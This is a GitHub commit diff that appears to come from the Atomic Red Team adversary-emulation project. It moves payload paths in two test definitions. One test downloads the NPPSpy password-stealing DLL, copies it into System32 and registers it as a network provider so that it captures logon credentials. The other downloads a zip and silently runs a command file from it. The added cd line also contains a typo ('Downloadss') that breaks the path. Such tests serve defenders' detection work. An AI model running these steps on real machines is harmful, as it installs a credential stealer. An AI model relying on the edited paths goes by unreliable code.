use ExternalPayloads folder (#2538)

redcanaryco · Sep 23, 2023 · fc3bfec · fc3bfec
1 parent 78204c6
commit fc3bfec
Show file tree

Hide file tree

Showing 2 changed files with 8 additions and 8 deletions.
diff --git a/atomics/T1003/T1003.yaml b/atomics/T1003/T1003.yaml
@@ -66,7 +66,7 @@ atomic_tests:
       Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "PathToAtomicsFolder\..\ExternalPayloads\NPPSPY.dll"
   executor:
     command: |-
-      Copy-Item "PathToAtomicsFolder\ExternalPayloads\NPPSPY.dll" -Destination "C:\Windows\System32"
+      Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\NPPSPY.dll" -Destination "C:\Windows\System32"
       $path = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name PROVIDERORDER
       $UpdatedValue = $Path.PROVIDERORDER + ",NPPSpy"
       Set-ItemProperty -Path $Path.PSPath -Name "PROVIDERORDER" -Value $UpdatedValue

diff --git a/atomics/T1036/T1036.yaml b/atomics/T1036/T1036.yaml
@@ -27,15 +27,15 @@ atomic_tests:
   dependencies:
   - description: Zip file must be present.
     prereq_command: |
-      if (Test-Path $env:userprofile\Downloads\T1036.zip) {exit 0} else {exit 1}
+      if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\T1036.zip") {exit 0} else {exit 1}
     get_prereq_command: |
-      Invoke-WebRequest -OutFile "$env:userprofile\Downloads\T1036.zip" #{url}
+      Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\T1036.zip" #{url}
   executor:
     command: |-
-      Expand-Archive -Path $env:userprofile\Downloads\T1036.zip -DestinationPath $env:userprofile\Downloads\T1036 -Force
-      cd $env:userprofile\Downloads\T1036
-      cmd /c $env:userprofile\Downloads\T1036\README.cmd >$null 2>$null
+      Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\T1036.zip" -DestinationPath "$env:userprofile\Downloads\T1036" -Force
+      cd "$env:userprofile\Downloadss\T1036"
+      cmd /c "$env:userprofile\Downloads\T1036\README.cmd" >$null 2>$null
     cleanup_command: |-
       taskkill /IM Calculator.exe /f >$null 2>$null
-      Remove-Item $env:userprofile\Downloads\T1036 -recurse -ErrorAction Ignore
-    name: powershell
+      Remove-Item "$env:userprofile\Downloads\T1036" -recurse -ErrorAction Ignore
+    name: powershell